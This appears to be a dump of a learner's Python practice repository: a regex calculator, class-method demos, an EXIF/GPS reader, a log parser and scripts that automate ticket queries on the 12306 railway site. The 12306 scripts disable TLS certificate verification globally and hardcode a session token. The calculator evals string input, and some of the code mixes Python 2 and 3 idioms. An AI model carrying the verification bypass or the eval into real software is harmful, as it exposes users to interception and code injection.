resault = x + y\n        else:\n            resault = x - y\n        resault = str(resault)\n        end = s.replace(ret, resault)\n        if re.search('-\\d', end):\n            # print '222', end\n            return addminus(end)\n        else:\n            # print '1111', re.sub('[\\(\\)]', '', addminus(end))\n            return re.sub('[\\(\\)]', '', addminus(end))\n    else:\n        return str(eval(s))\n\n\ndef chengchu(s):\n    # global endend\n    ret = re.search('\\d+\\.?\\d*[*/]\\d+\\.?\\d*', s)\n    if ret:\n        ret = ret.group()\n        x, y = re.split('[*/]', ret)\n        x = float(x)\n        y = float(y)\n        ysf = re.search('[*/]', ret).group()\n        if ysf == '*':\n            resault = x*y\n        else:\n            resault = x/y\n        resault = str(resault)\n        endend = s.replace(ret, resault)\n        return chengchu(endend)\n    else:\n        return s\n\n\ndef check(s):\n    ret = re.findall('([\\(\\)]+)', s)\n    if ret:\n        return 'True'\n    if re.search('[*/]', s):\n        ysf = re.search('[*/]', s).group()\n        if ysf == '*':\n            return '*'\n        else:\n            return '/'\n    if re.search('[+-]', s):\n        ysf = re.search('[+-]', s).group()\n        if ysf == '+':\n            return '+'\n        else:\n            return 
'-'\n\n\ndef js(s):\n if check(s) == 'True':\n rent = re.findall('\\([^()]+\\)', s)\n for i in rent:\n endrepl = chengchu(i)\n endall = addminus(endrepl)\n s = s.replace(i, endall)\n\n return addminus(s)\n elif check(s) == '*' or check(s) == '/':\n tmp = chengchu(s)\n if check(tmp) == '-' or check(tmp) == '+':\n return addminus(tmp)\n else:\n return tmp\n else:\n return addminus(s)\n\n\n# striaaa = '(((3+2*4*10)*(5-2+3*4)+100-12*4/6+40-100)-(8*9/5-10+50/4)+(10-5+4*8/2-20+5.5))'\nstriaaa = '((1+2)*(3-5)-10)+5'\nprint \"最终结果:\", striaaa, '=', js(striaaa)\n\n" }, { "alpha_fraction": 0.49356546998023987, "alphanum_fraction": 0.5280090570449829, "avg_line_length": 18.00719451904297, "blob_id": "700a5ba143908eb86a0de66c54e95ee202323803", "content_id": "265c44b59eb0a61182d33bfb6cb6bf7b8a4e2fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3186, "license_type": "no_license", "max_line_length": 91, "num_lines": 139, "path": "/python学习/面向对象学习/class_特殊成员.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-23\n\n__author__ = '@jiawenlong'\n\n\"\"\"\nclass Foo: # 特殊成员\n def __init__(self):\n print('init')\n\n def __int__(self):\n print(456)\n return 111\n\n def __str__(self):\n print('str')\n return 'jiawenlong'\n\n def __call__(self, *args, **kwargs):\n print('call', args, kwargs)\n\n\nobj = Foo() # 执行 init\nobj(123, a=3, b='c') # 执行 call\n\n# print(obj) # print(str(obj)) 执行obj中的 __str__ ; str(obj)\nstr(obj)\n# r = str(obj)\n# print(r)\n\n# print(int(obj)) 执行obj中的 __int__ ; int(obj)\nint(obj)\n# r = int(obj)\n# print(r)\n\n\n__dict__(): # 将对象中封装的所有内容,通过字典的形式返回\n\n\nclass Foo:\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __add__(self, other): # 可以是减、乘除等\n # self = obj1 ('name', 19)\n # other = obj2 ('jiawenlong', 20)\n return self.age + other.age\n # return Foo(other.name, self.age)\n\n def __del__(self): # 析构方法 对象被销毁时自动执行\n pass\n # print('析构方法')\n\n\n\n\nobj1 = Foo('name', 19)\nobj2 = Foo('jiawenlong', 20)\n\nr = obj1 + obj2\n# 两个对象相加,自动执行第一个对象的 __add__ 方法,并且将第二个对象作为参数传递进入\nprint(r) \n# print(r.name, r.age)\n\nd = obj1.__dict__ # 将对象中封装的所有内容,通过字典的形式返回\nprint(d)\nret = Foo.__dict__\nprint(ret)\n\n\nclass Foo:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __getitem__(self, item):\n # return item + 10\n if type(item) == slice: # li[1:2:3]\n print('\\n进行切片处理')\n print('start: %s' % item.start)\n print('end: %s' % item.stop)\n print('step: %s\\n' % item.step)\n else:\n print('进行索引处理')\n print(item, type(item))\n\n def __setitem__(self, key, value):\n print(key, value)\n\n def __delitem__(self, key):\n print(key)\n\n\nli = Foo('jia', 19)\nr = li[8] # 自动执行li对象的类中的 __getitem__ 方法,8 当参数传递给 item\n# print(r)\nli[1:3:2]\n\nli[100] = 'haha'\ndel li[999]\n\"\"\"\n\n\nclass Foo:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __iter__(self):\n # return iter([11, 22, 33, 44])\n return [11, 22, 33, 44]\n\n def __str__(self):\n return 'jiawenlong'\n\n\nli = Foo('Justin', 19)\n# 1 执行 li 对象的类中的 __iter__方法,并获取其返回值\n# 2 循环上一步中的返回对象\n\n# 如果类中 有 __iter__ 方法,创建的对象就是可迭代对象\n# 对于 可迭代对象.__iter__() 的返回值 是 迭代器\n# 对于 for 循环,遇到迭代器,执行迭代器的next方法 ; iter([11, 22, 33, 44]) 迭代器\n# 如果是可迭代对象,获取对象的 __iter__方法,然后执行迭代器的next方法 ;def __iter__(): return [11, 22, 33, 44], 可迭代对象\na = li.__iter__()\nprint(type(a))\n\nb = [1, 2, 3]\nprint(type(b))\n\nfor i in li.__iter__():\n 
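# (added note) __iter__ above returns a plain list, so it is called explicitly and its\n    # elements are iterated directly; 'for i in li:' would raise TypeError because iter()\n    # requires __iter__ to return an iterator, e.g. 'return iter([11, 22, 33, 44])'.\n    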
print(i)\n\nname = li\nprint(name)\n" }, { "alpha_fraction": 0.49883225560188293, "alphanum_fraction": 0.5221871137619019, "avg_line_length": 23.928081512451172, "blob_id": "148ee459232c10a782d3cce1b346bb3279ce1e20", "content_id": "cde16fb4e4d489cafdce8c048b1aa1d8d04a0466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7301, "license_type": "no_license", "max_line_length": 96, "num_lines": 292, "path": "/python学习/面向对象学习/读取图片信息.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-05-22\n\n__author__ = '@jiawenlong'\n\n\nimport binascii\n\n\nclass ParseMethod(object):\n @staticmethod\n def parse_default(f, count, offset):\n pass\n\n @staticmethod\n def parse_latitude(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n latitude = [0, 0, 0]\n for i in xrange(count):\n byte = f.read(4)\n numerator = byte.encode('hex')\n\n byte = f.read(4)\n denominator = byte.encode('hex')\n\n latitude[i] = float(int(numerator, 16)) / int(denominator, 16)\n\n print('Latitude:\\t%.2f %.2f\\' %.2f\\\"' % (latitude[0], latitude[1], latitude[2]))\n f.seek(old_pos)\n\n @staticmethod\n def parse_longtitude(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n longtitude = [0, 0, 0]\n for i in xrange(count):\n byte = f.read(4)\n numerator = byte.encode('hex')\n\n byte = f.read(4)\n denominator = byte.encode('hex')\n\n longtitude[i] = float(int(numerator, 16)) / int(denominator, 16)\n\n print('Longtitude:\\t%.2f %.2f\\' %.2f\\\"' % (longtitude[0], longtitude[1], longtitude[2]))\n f.seek(old_pos)\n\n @staticmethod\n def parse_make(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('Make:\\t\\t' + binascii.a2b_hex(a))\n f.seek(old_pos)\n\n @staticmethod\n def parse_model(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('Model:\\t\\t' + binascii.a2b_hex(a))\n\n f.seek(old_pos)\n\n @staticmethod\n def parse_datetime(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('DateTime:\\t' + binascii.a2b_hex(a))\n f.seek(old_pos)\n\n # rational data type, 05\n @staticmethod\n def parse_xresolution(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(4)\n numerator = byte.encode('hex')\n byte = f.read(4)\n denominator = byte.encode('hex')\n xre = int(numerator, 16) / int(denominator, 16)\n\n print('XResolution:\\t' + str(xre) + ' dpi')\n f.seek(old_pos)\n\n @staticmethod\n def parse_yresolution(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(4)\n numerator = byte.encode('hex')\n byte = f.read(4)\n denominator = byte.encode('hex')\n xre = int(numerator, 16) / int(denominator, 16)\n\n print('YResolution:\\t' + str(xre) + ' dpi')\n f.seek(old_pos)\n\n @staticmethod\n def parse_exif_ifd(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(2)\n a = byte.encode('hex')\n exif_ifd_number = int(a, 16)\n\n for i in xrange(exif_ifd_number):\n byte = f.read(2)\n tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.encode('hex')\n # print value_offset\n\n value_offset = int(value_offset, 16)\n 
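# (added note) dict-based dispatch, the same 'simulate switch' pattern used at the\n            # bottom of this file: look the tag id up and fall back to parse_default for\n            # unknown tags. A minimal standalone sketch (hypothetical names):\n            #     handlers = {'a002': parse_x, 'a003': parse_y}\n            #     handlers.get(tag_id, parse_default)(args)\n            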
EXIF_IFD_DICT.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n f.seek(old_pos)\n\n @staticmethod\n def parse_x_pixel(f, count, value):\n print('X Pixels:\\t' + str(value))\n\n @staticmethod\n def parse_y_pixel(f, count, value):\n print('y Pixels:\\t' + str(value))\n\n @staticmethod\n def parse_gps_ifd(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(2)\n a = byte.encode('hex')\n gps_ifd_number = int(a, 16)\n\n for i in xrange(gps_ifd_number):\n byte = f.read(2)\n tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.encode('hex')\n # print value_offset\n\n count = int(count, 16)\n value_offset = int(value_offset, 16)\n GPS_IFD_DICT.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n f.seek(old_pos)\n\n\nIFD_dict = {\n '010f': ParseMethod.parse_make,\n '0110': ParseMethod.parse_model,\n '0132': ParseMethod.parse_datetime,\n '011a': ParseMethod.parse_xresolution,\n '011b': ParseMethod.parse_yresolution,\n '8769': ParseMethod.parse_exif_ifd,\n '8825': ParseMethod.parse_gps_ifd\n}\n\nEXIF_IFD_DICT = {\n 'a002': ParseMethod.parse_x_pixel,\n 'a003': ParseMethod.parse_y_pixel\n}\n\nGPS_IFD_DICT = {\n '0002': ParseMethod.parse_latitude,\n '0004': ParseMethod.parse_longtitude\n}\n\nimage = '/Users/admin/Downloads/备案/阿里云背景照片.jpeg'\nwith open(image, 'rb') as f:\n byte = f.read(2)\n print('+++++byte', byte)\n print('+++++', bytes(byte))\n # a = byte.encode('hex')\n a = byte.hex()\n print('-----', byte.fromhex('4a464946'))\n print('SOI Marker:\\t' + a)\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('APP1 Marker:\\t' + a)\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('APP1 Length:\\t' + str(int(a, 16)) + ' .Dec')\n\n byte = f.read(4)\n # a = byte.encode('hex')\n a = byte.hex()\n print('-----', a)\n print('Identifier:\\t' + binascii.a2b_hex(a))\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('Pad:\\t\\t' + a)\n\n print()\n\n print('Begin to print Header.... 
')\n\n print('APP1 Body: ')\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('Byte Order:\\t' + a)\n\n byte = f.read(2)\n a = byte.hex()\n # a = byte.encode('hex')\n print('42:\\t\\t' + a)\n\n byte = f.read(4)\n a = byte.hex()\n # a = byte.encode('hex')\n print('0th IFD Offset:\\t' + a)\n\n print('Finish print Header')\n\n print('Begin to print 0th IFD....')\n\n print()\n # print 'Total: ',\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n interoperability_number = int(a, 16)\n # print interoperability_number\n\n for i in xrange(interoperability_number):\n byte = f.read(2)\n tag_id = byte.hex()\n # tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.hex()\n # type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.hex()\n # count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.hex()\n # print value_offset\n\n count = int(count, 16)\n value_offset = int(value_offset, 16)\n\n # simulate switch\n IFD_dict.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n print()\n print('Finish print 0th IFD....')\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8372092843055725, "avg_line_length": 13.333333015441895, "blob_id": "325e2628e1d2595db14b0c7e5467d3475bc566f5", "content_id": "15eb9bf05984dc28ae8cbfeffae9ecd889c75220", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/README.md", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "# untitled\npython练习,项目未定义\n这是自己练习的小项目,项目未定义\n" }, { "alpha_fraction": 0.43250882625579834, "alphanum_fraction": 0.4395759701728821, "avg_line_length": 32.69047546386719, "blob_id": "d799b68b6026927b40853844e8a29a9bf62dfdd9", "content_id": "656b31291e74df9a29a8ded09a63ad7144009746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 108, "num_lines": 42, "path": "/未定义项目练习/ipos_log.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-06-15\n\nimport json\n\njson_info = '/Users/admin/Documents/crt/json.log'\nlog = open(json_info, 'rb')\nend = open('/Users/admin/Documents/crt/end.txt', 'w+')\n\n# 读取每一行\nfor line in log.readlines():\n # 转换json 为字典\n json_s = json.loads(line)\n for k in json_s:\n if k == 'plain':\n Dict = json_s['plain']\n # print(Dict)\n # print(json.dumps(Dict, ensure_ascii=False))\n # ensure_ascii=False dumps 默认是使用ascii 对中文进行编码,这个参数禁止使用ascii对中文进行编码\n # 判断 字典 中是否 包含key值 payStatus\n if 'payStatus' in Dict.keys():\n Upay = \"(F\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] + \"'\" + \",\" + \"'\" + \\\n Dict['payStatus'] + \"'\" + \")\" + \",\"\n # print(Upay)\n end.write(Upay)\n end.write('\\n')\n # print(\"(F\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] + \"'\" + \",\" + \"'\" + \\\n # Dict['payStatus'] + \"'\" + \")\" + \",\")\n\n else:\n Upay = \"(S\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] \\\n + \"'\" + \",\" + \"'\" + \"'\" + \")\" + \",\"\n # print(Upay)\n end.write(Upay)\n end.write('\\n')\n # print(\"(S\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] \\\n # + \"'\" + \",\" + \"'\" + 
\"'\" + \")\" + \",\")\n\n# i = \"xxx\"\n# i.encode('utf-8')\n" }, { "alpha_fraction": 0.5357917547225952, "alphanum_fraction": 0.5813449025154114, "avg_line_length": 15.428571701049805, "blob_id": "eb80d918c3149cf5b81a82527251df6aed82869f", "content_id": "57301559128e577fbf36fafba7574e6632836cac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/python学习/函数/func.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/8 22:19\n\n\ndef logger(log_text):\n f = open(\"test.log\", 'a')\n f.write(log_text)\n f.close()\n print(log_text)\n\n\n# logger('Hello')\n\n\n# subroutine 【子程序】 , procedures 【过程】 函数\n# 作用: 减少重复代码、方便修改、更易扩展、保持代码一致性\n\ndef f(**kwargs):\n print(kwargs)\n\n\nzd = {'name': 'Jiawenong', \"age\": 31}\n\nf(**zd)\nf(**{'IP': '11.12.13.14', 'LocalName': 'Uinnova_Tarsier'})\n# ** 后面直接跟json格式字符串\n\n" }, { "alpha_fraction": 0.6167008876800537, "alphanum_fraction": 0.6721423864364624, "avg_line_length": 22.580644607543945, "blob_id": "2ec7c4fa124fd976f7e88adfc1ef5d3d049cf8c7", "content_id": "8a369733e2023c5a7cb4dc2a4ef389a951de35d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1499, "license_type": "no_license", "max_line_length": 143, "num_lines": 62, "path": "/12306/fuck12306_booking.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-27\n\n__author__ = '@jiawenlong'\n\nimport urllib2\nimport urllib\nimport ssl\nimport cookielib\nimport json\nimport sys\n# from fuck12306_login import opener\n\n\n\n### cookie 生成\nc = cookielib.MozillaCookieJar()\nc.load('cookie.txt', ignore_discard=True, ignore_expires=True)\ncookie = urllib2.HTTPCookieProcessor(c)\nopener = urllib2.build_opener(cookie)\n\n# 忽略证书认证\nssl._create_default_https_context = ssl._create_unverified_context\n\ncheck_user = 'https://kyfw.12306.cn/otn/login/checkUser'\norder_ticket = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'\nrefer = 'https://kyfw.12306.cn/otn/leftTicket/init'\n\n\ndef add_header(req, url):\n # 对请求 添加 header\n req.add_header('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n req.add_header('Referer', url)\n req.add_header('Host', 'kyfw.12306.cn')\n\n\n\nreq = urllib2.Request(order_ticket)\n# data = {\n# '_json_att': ''\n# }\ndata = {\n 'secretStr': 'rbg8kDTTZO8TcRFcrn/6HFDFTNQhhV9iuiQbamUbHKg0GKJgbl2I5vCnVl9nKz/0jWJNlO5VcS0uRDTKxwRA0kZr6uYq5KewILynD+NfoMdjqU7IU+mE3MtrqDvvGBmGg0NsDQ/8xleae34fHtY7G/SEeMU4mRAb/1KRTLstzvPVsE/7tftaQHiOK1BvYJdFIuflwtBYuJyVdqdpZtH22PS7gx9XnJ0FDauBXjU51V81uEEtxu/KOw==',\n 'train_date': '2017-12-05',\n 'back_train_date': '2017-12-05',\n 'tour_flag': 'dc',\n 'purpose_codes': 'ADULT',\n 'query_from_station_name': '北京',\n 'query_to_station_name': '天津',\n 'undefined': ''\n}\ndata = urllib.urlencode(data)\nprint req, data\nadd_header(req, refer)\n\n\nprint req.headers\nresault = opener.open(req, data=data)\nprint resault.read()" }, { "alpha_fraction": 0.521268904209137, "alphanum_fraction": 0.541456401348114, "avg_line_length": 13.913978576660156, "blob_id": "8b5690d4d78605e087d1511f3dbe17c441a840c1", "content_id": "198a12db57c8f670787444de3c1778642c0d129e", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1615, "license_type": "no_license", "max_line_length": 51, "num_lines": 93, "path": "/python学习/面向对象学习/class_成员修饰符.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-23\n\n__author__ = '@jiawenlong'\n\n\"\"\"\n# 私有字段,私有静态字段\nclass Foo:\n __country = \"__中国\" # 私有静态字段\n country = \"中国\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.__age = age # 私有字段 外部无法字节访问 ;__ 成员修饰符\n\n # 私有字段的调用\n def show(self):\n return self.__age\n\n # 私有静态字段的调用\n def show_country(self):\n return Foo.__country\n\n @staticmethod\n def show2_country():\n return Foo.__country\n\n\nobj = Foo('jiawenlong', 19)\n\n# 普通字段引用\nprint(obj.name)\nprint(obj.age)\n# 私有字段引用\nret = obj.show()\nprint(ret)\n\n# 静态字段引用\nprint(Foo.country)\n# print(obj.country)\n# 私有静态字段引用\nret = obj.show_country()\nprint(ret)\n\n# 静态方法用于待用私有静态字段\nprint(Foo.show2_country())\n\"\"\"\n\n'''\n# 方法的私有化\nclass Foo:\n def __f1(self):\n return 123\n\n def f2(self):\n r = self.__f1()\n return r\n\n\nobj = Foo()\nret = obj.f2()\nprint(ret)\n'''\n\n\n# 继承的私有,私有无法继承\nclass F:\n def __init__(self):\n self.__gr = 123\n self.gr = 456\n\n def showm(self):\n return self.__gr\n\n\nclass S(F):\n def __init__(self, name):\n self.name = name\n self.__age = 18\n super(S, self).__init__()\n\n def show(self):\n print(self.name)\n print(self.__age)\n print(self.gr)\n print(self.showm())\n\n\ns = S('jiawenlong')\ns.show()\n" }, { "alpha_fraction": 0.483152836561203, "alphanum_fraction": 0.5018050670623779, "avg_line_length": 13.972972869873047, "blob_id": "987e4e089cd9776f86bfc2fb6ba63998159afaf2", "content_id": "27b35ba20bb6433565d101195f893f7ba68f0a79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1872, "license_type": "no_license", "max_line_length": 52, "num_lines": 111, "path": "/python学习/面向对象学习/class_继承.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-19\n\n__author__ = '@jiawenlong'\n\n\n# class Father: # 父类、基类\n#\n# def basketball(self):\n# pass\n#\n# def football(self):\n# pass\n#\n# def smoke(self):\n# pass\n#\n# def drink(self):\n# pass\n#\n#\n# class Son(Father): # 和 Father 建立 关系 ,即子类、派生类\n# def bj(self):\n# pass\n\n#\n# class F:\n# def f1(self):\n# print('F.f1')\n#\n# def f2(self, name):\n# print('对 %s' % name)\n#\n#\n# class F1:\n# def f3(self):\n# print('F.f3')\n#\n#\n# class S(F, F1):\n# def s1(self, s):\n# print('%s' % s, end='')\n#\n# def f2(self, name):\n# print('%s' % name)\n# # super(S, self).f1() # 既执行子类方法,也执行父类相同方法\n# F.f2(self, name) # 还可以这样执行父类方法\n#\n#\n# s = S()\n# s.s1(\"贾文龙\")\n# s.f2('是好人')\n\n\n# 多继承 优先左边往上执行,如果有公用基类,先走左边,没有找到方法后,走右边执行,最终执行基类\n# class F0:\n# def a(self):\n# print('F1.a')\n#\n#\n# class F1(F0):\n# def a(self):\n# print('F1.a')\n#\n#\n# class F2:\n# def a(self):\n# print('F2.a')\n#\n#\n# class S(F1, F2):\n# pass\n#\n#\n# obj = S()\n# obj.a()\n\n\n# 多继承例子\nclass Base:\n def __init__(self):\n print('Base.init')\n\n\nclass RequestHandler(Base):\n def __init__(self):\n Base.__init__(self)\n print('RequestHandler.init')\n\n\n def save_forever(self):\n print('RequestHandler.save_forever')\n person.process() # self.process()\n\n def process(self):\n print('RequestHandler.process')\n\n\nclass Minx():\n def process(self):\n 
print('Minx.process')\n\n\nclass Son(Minx, RequestHandler):\n pass\n\n\nperson = Son()\nperson.save_forever()\n" }, { "alpha_fraction": 0.48550572991371155, "alphanum_fraction": 0.536392092704773, "avg_line_length": 28.060606002807617, "blob_id": "0ec44ec4d43063b94c8f76b441bbd505c95a9b4e", "content_id": "8a762136f96b42315bba713be501627bc4be5f52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5189, "license_type": "no_license", "max_line_length": 132, "num_lines": 165, "path": "/12306/fuck12306_check_seat.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\nimport urllib2\nimport ssl\nfrom json import loads\nimport sys\nfrom fuck12306_get_city import get_city_code # 查询城市信息,返回城市代码\n\nssl._create_default_https_context = ssl._create_unverified_context # 忽略证书认证\n\n\n# start_station = raw_input('请输入始发站:')\n# ended_station = raw_input('请输入终点站:')\n# train_date = raw_input('请输入乘车日期:')\n# train_name = raw_input('请输入车次或者不输入:')\n# from_station = get_city_code(start_station)\n# to_station = get_city_code(ended_station)\n\nfrom_station = get_city_code(\"北京\")\nto_station = get_city_code(\"平顶山\")\ntrain_date = '2017-12-10'\ntrain_name = 'K261'\n# train_date = '2017-11-25'\n\n# 城市 https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9027\n# 请求的 火车票 的地址 包含了 始发站 目的站 乘车时间\nticket = 'https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=' + train_date + \\\n '&leftTicketDTO.from_station=' + from_station + \\\n '&leftTicketDTO.to_station=' + to_station + \\\n '&purpose_codes=ADULT'\n\n\ndef getSeat():\n html = urllib2.urlopen(ticket).read()\n dict = loads(html)\n # print dict['messages'][0]\n if dict['messages']:\n print dict['messages'][0]\n sys.exit()\n else:\n return dict['data']['result']\n\n\ndef get_train(**kwargs):\n trains = kwargs\n return trains\n\n\ndef check_seat():\n global train_name\n \"\"\"暂时只打印一个车次的 我们需要的 信息\"\"\"\n for i in getSeat():\n split_list = i.split('|')\n train = get_train(ticket_name=split_list[3], start_time=split_list[8], end_time=split_list[9],\n live_time=split_list[10],\n soft_sleeper=split_list[23], no_seat=split_list[26], hard_sleeper=split_list[28],\n hard_seat=split_list[29], second=split_list[30], first=split_list[31], buss=split_list[32])\n # print train['soft_sleeper']\n # print train['ticket_name']\n if train_name:\n train_name = train_name.upper()\n if train_name == train['ticket_name']:\n print train['ticket_name']\n print \"订票\"\n else:\n continue\n else:\n train_name = train['ticket_name']\n print \"没有车次信息,默认为: \", train_name\n print \"订票\"\n sys.exit()\n #\n # break\n\n# check_seat()\n\n\n# def getSeat():\n# # print my_ticket\n# html = urllib2.urlopen(ticket).read()\n# # print(html)\n# # print(type(html))\n# # print(loads(html))\n# dict = loads(html)\n# # print dict['data']['result']\n# # print dict\n# return dict['data']['result']\n#\n# def print_seat():\n# \"\"\"暂时只打印一个车次的 我们需要的 信息\"\"\"\n# train = {}\n# for i in getSeat():\n# split_list = i.split('|')\n# train = get_train(ticket_name=split_list[3], start_time=split_list[8], end_time=split_list[9], live_time=split_list[10], \\\n# soft_sleeper=split_list[23], no_seat=split_list[26], hard_sleeper=split_list[28], \\\n# hard_seat=split_list[29], second=split_list[30], first=split_list[31], buss=split_list[32])\n#\n# # train['ticket_name'] = split_list[3]\n# # train['start_time'] = split_list[8]\n# # train['end_time'] = 
" }, { "alpha_fraction": 0.48550572991371155, "alphanum_fraction": 0.536392092704773, "avg_line_length": 28.060606002807617, "blob_id": "0ec44ec4d43063b94c8f76b441bbd505c95a9b4e", "content_id": "8a762136f96b42315bba713be501627bc4be5f52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5189, "license_type": "no_license", "max_line_length": 132, "num_lines": 165, "path": "/12306/fuck12306_check_seat.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\nimport urllib2\nimport ssl\nfrom json import loads\nimport sys\nfrom fuck12306_get_city import get_city_code  # looks up a city name and returns its station code\n\nssl._create_default_https_context = ssl._create_unverified_context  # skip TLS certificate verification\n\n\n# start_station = raw_input('Departure station: ')\n# ended_station = raw_input('Destination station: ')\n# train_date = raw_input('Travel date: ')\n# train_name = raw_input('Train number (optional): ')\n# from_station = get_city_code(start_station)\n# to_station = get_city_code(ended_station)\n\nfrom_station = get_city_code(\"北京\")\nto_station = get_city_code(\"平顶山\")\ntrain_date = '2017-12-10'\ntrain_name = 'K261'\n# train_date = '2017-11-25'\n\n# station table: https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9027\n# left-ticket query URL, carrying the departure station, destination and travel date\nticket = 'https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=' + train_date + \\\n         '&leftTicketDTO.from_station=' + from_station + \\\n         '&leftTicketDTO.to_station=' + to_station + \\\n         '&purpose_codes=ADULT'\n\n\ndef getSeat():\n    html = urllib2.urlopen(ticket).read()\n    resp = loads(html)  # renamed from 'dict' so the builtin is not shadowed\n    if resp['messages']:  # the API reports query errors here\n        print resp['messages'][0]\n        sys.exit()\n    else:\n        return resp['data']['result']\n\n\ndef get_train(**kwargs):\n    return kwargs\n\n\ndef check_seat():\n    \"\"\"For now, only print the fields we need for a single train.\"\"\"\n    global train_name\n    for i in getSeat():\n        split_list = i.split('|')\n        train = get_train(ticket_name=split_list[3], start_time=split_list[8], end_time=split_list[9],\n                          live_time=split_list[10],\n                          soft_sleeper=split_list[23], no_seat=split_list[26], hard_sleeper=split_list[28],\n                          hard_seat=split_list[29], second=split_list[30], first=split_list[31], buss=split_list[32])\n        if train_name:\n            train_name = train_name.upper()\n            if train_name == train['ticket_name']:\n                print train['ticket_name']\n                print \"booking ticket\"\n            else:\n                continue\n        else:\n            train_name = train['ticket_name']\n            print \"no train number given, defaulting to:\", train_name\n            print \"booking ticket\"\n            sys.exit()\n\n# 